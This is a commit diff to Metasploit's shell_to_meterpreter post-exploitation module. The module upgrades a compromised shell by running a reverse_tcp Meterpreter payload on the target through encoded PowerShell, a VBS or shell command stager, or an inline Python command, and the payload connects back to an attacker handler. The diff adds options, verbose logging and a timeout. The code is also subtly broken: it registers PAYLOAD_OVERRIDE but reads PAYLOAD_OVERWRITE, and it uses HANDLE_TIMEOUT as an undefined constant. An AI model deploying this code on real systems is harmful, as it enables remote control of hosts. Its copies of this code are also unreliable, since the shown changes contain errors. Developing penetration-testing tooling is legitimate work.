Land rapid7#5530, shell_to_meterpreter improvements

wvu · wvu · commit ef825fb4bfe5 · 2015-06-16T14:29:15.000-05:00
diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -29,18 +29,31 @@ def initialize(info = {})
     register_options(
       [
         OptAddress.new('LHOST',
-          [false, 'IP of host that will receive the connection from the payload.']),
+          [false, 'IP of host that will receive the connection from the payload (Will try to auto detect).', nil]),
         OptInt.new('LPORT',
-          [false, 'Port for Payload to connect to.', 4433]),
+          [true, 'Port for payload to connect to.', 4433]),
         OptBool.new('HANDLER',
           [ true, 'Start an exploit/multi/handler to receive the connection', true])
       ], self.class)
+    register_advanced_options([
+      OptInt.new('HANDLE_TIMEOUT',
+        [true, 'How long to wait (in seconds) for the session to come back.', 30]),
+      OptEnum.new('WIN_TRANSFER',
+        [true, 'Which method to try first to transfer files on a Windows target.', 'POWERSHELL', ['POWERSHELL', 'VBS']]),
+      OptString.new('PAYLOAD_OVERRIDE',
+        [false, 'Define the payload to use (meterpreter/reverse_tcp by default) .', nil])
+    ], self.class)
     deregister_options('PERSIST', 'PSH_OLD_METHOD', 'RUN_WOW64')
   end
 
-  # Run Method for when run command is issued
+  # Run method for when run command is issued
   def run
-    print_status("Upgrading session: #{datastore['SESSION']}")
+    print_status("Upgrading session ID: #{datastore['SESSION']}")
+
+    if session.type =~ /meterpreter/
+      print_error("Shell is already Meterpreter.")
+      return nil
+    end
 
     # Try hard to find a valid LHOST value in order to
     # make running 'sessions -u' as robust as possible.
@@ -52,7 +65,7 @@ def run
       lhost = session.tunnel_local.split(':')[0]
     end
 
-    # If nothing else works....
+    # If nothing else works...
     lhost = Rex::Socket.source_address if lhost.blank?
 
     lport = datastore['LPORT']
@@ -65,27 +78,34 @@ def run
       lplat = [Msf::Platform::Windows]
       larch = [ARCH_X86]
       psh_arch = 'x86'
+      print_status("Platform: Windows") if datastore['VERBOSE']
     when /osx/i
       platform = 'python'
       payload_name = 'python/meterpreter/reverse_tcp'
+      print_status("Platform: OS X") if datastore['VERBOSE']
     when /solaris/i
       platform = 'python'
       payload_name = 'python/meterpreter/reverse_tcp'
+      print_status("Platform: Solaris") if datastore['VERBOSE']
     else
-      # Find the best fit, be specific w/ uname to avoid matching hostname or something else
+      # Find the best fit, be specific with uname to avoid matching hostname or something else
       target_info = cmd_exec('uname -mo')
       if target_info =~ /linux/i && target_info =~ /86/
         # Handle linux shells that were identified as 'unix'
         platform = 'linux'
         payload_name = 'linux/x86/meterpreter/reverse_tcp'
         lplat = [Msf::Platform::Linux]
         larch = [ARCH_X86]
+        print_status("Platform: Linux") if datastore['VERBOSE']
       elsif cmd_exec('python -V') =~ /Python (2|3)\.(\d)/
         # Generic fallback for OSX, Solaris, Linux/ARM
         platform = 'python'
         payload_name = 'python/meterpreter/reverse_tcp'
+        print_status("Platform: Python [fallback]") if datastore['VERBOSE']
       end
     end
+    payload_name = datastore['PAYLOAD_OVERWRITE'] if datastore['PAYLOAD_OVERWRITE']
+    print_status("Upgrade payload: #{payload_name}") if datastore['VERBOSE']
 
     if platform.blank?
       print_error("Shells on the the target platform, #{session.platform}, cannot be upgraded to Meterpreter at this time.")
@@ -108,21 +128,29 @@ def run
 
     case platform
     when 'win'
-      if have_powershell?
+      if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
+        print_status("Transfer method: Powershell") if datastore['VERBOSE']
         psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
         cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
       else
+        print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
+        print_status("Transfer method: VBS [fallback]") if datastore['VERBOSE']
         exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
         aborted = transmit_payload(exe)
       end
     when 'python'
+      print_status("Transfer method: Python") if datastore['VERBOSE']
       cmd_exec("python -c \"#{payload_data}\"")
     else
+      print_status("Transfer method: Bourne shell [fallback]") if datastore['VERBOSE']
       exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
       aborted = transmit_payload(exe)
     end
 
-    cleanup_handler(listener_job_id, aborted) if datastore['HANDLER']
+    if datastore['HANDLER']
+      print_status("Cleaning up handler") if datastore['VERBOSE']
+      cleanup_handler(listener_job_id, aborted)
+    end
     return nil
   end
 
@@ -150,7 +178,7 @@ def transmit_payload(exe)
 
     cmds = cmdstager.generate(opts)
     if cmds.nil? || cmds.length < 1
-      print_error('The command stager could not be generated')
+      print_error('The command stager could not be generated.')
       raise ArgumentError
     end
 
@@ -160,6 +188,7 @@ def transmit_payload(exe)
     total_bytes = 0
     cmds.each { |cmd| total_bytes += cmd.length }
 
+    print_status("Starting transfer...") if datastore['VERBOSE']
     begin
       #
       # Run the commands one at a time
@@ -198,12 +227,11 @@ def transmit_payload(exe)
   def cleanup_handler(listener_job_id, aborted)
     # Return if the job has already finished
     return nil if framework.jobs[listener_job_id].nil?
-
     framework.threads.spawn('ShellToMeterpreterUpgradeCleanup', false) {
       if !aborted
         timer = 0
-        while !framework.jobs[listener_job_id].nil? && timer < 10
-          # Wait up to 10 seconds for the session to come in..
+        print_status("Waiting up to #{HANDLE_TIMEOUT} seconds for the session to come back") if datastore['VERBOSE']
+        while !framework.jobs[listener_job_id].nil? && timer < HANDLE_TIMEOUT
           sleep(1)
           timer += 1
         end
@@ -218,7 +246,7 @@ def cleanup_handler(listener_job_id, aborted)
   #
   def progress(total, sent)
     done = (sent.to_f / total.to_f) * 100
-    print_status("Command Stager progress - %3.2f%% done (%d/%d bytes)" % [done.to_f, sent, total])
+    print_status("Command stager progress: %3.2f%% (%d/%d bytes)" % [done.to_f, sent, total])
   end
 
   # Method for checking if a listener for a given IP and port is present
